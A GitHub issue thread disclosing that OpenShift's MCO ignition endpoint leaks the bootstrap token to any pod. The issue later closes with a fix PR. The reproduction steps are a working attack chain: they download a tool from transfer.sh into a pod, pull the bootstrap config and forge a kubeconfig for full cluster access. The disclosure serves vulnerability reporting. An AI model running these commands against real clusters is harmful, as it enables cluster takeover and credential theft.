### ISSUE TITLE
Cluster can be hijacked/compromised via MCO ignition endpoint

### ISSUE THREAD

**Issue by FlorinPeter** [openshift/machine-config-operator#731]
**Description**
The MCO ignition endpoint is currently not secured which allows an attacker from a pod to get the bootstrap token and generate a kubeconfig to access the whole cluster.
A proof of concept can be found here https://github.com/FlorinPeter/kubeletmein#ocp4-1

**Steps to reproduce the issue:**
1. Build kubeletmein from https://github.com/FlorinPeter/kubeletmein
2. Upload for example via curl --upload-file ./kubeletmein https://transfer.sh/kubeletmein
3. RSH to any pod and execute the following steps 
```
cd /tmp/
curl -sL https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl -o kubectl
chmod 777 kubectl

curl https://transfer.sh/<random>/kubeletmein --output kubeletmein
chmod 777 kubeletmein
./kubeletmein bootstrap ocp -m https://api-int.<name>.<baseDomain>:22623/config/master
./kubeletmein generate -b /tmp/bootstrap-kubeconfig -k /tmp/kubeconfig -n hacker-node -d /tmp/pki
./kubectl --kubeconfig /tmp/kubeconfig get pods --all-namespaces
```
**Describe the results you received:**
I have access to the whole cluster

**Describe the results you expected:**
The MCO should be secured via mutual tls or some kind of random seed as an url parameter like https://api-int.name.baseDomain:22623/config/master?token=some_secure_token

**Additional information you deem important (e.g. issue happens only occasionally):**

**Additional environment details (platform, options, etc.):**
OCP4 RC-1

**Comment by runcom** [comment]
https://github.com/openshift/origin#security-response perhaps

**Comment by FlorinPeter** [comment]
As OCP4 it is not GA and it does not affect 3.11 I think that this is from my point of view currently the right place to discuss the issue.

**Comment by jasinner** [comment]
I created a (Red Hat internal) downstream security [tracking bug](https://bugzilla.redhat.com/show_bug.cgi?id=1710174) for this issue. I verified it's exploitable on 4.0.0-0.11. Please make sure the issue is addressed by 4.1 GA and attached to the Enhancement Errata.

**Comment by runcom** [comment]
Closed by https://github.com/openshift/machine-config-operator/pull/768
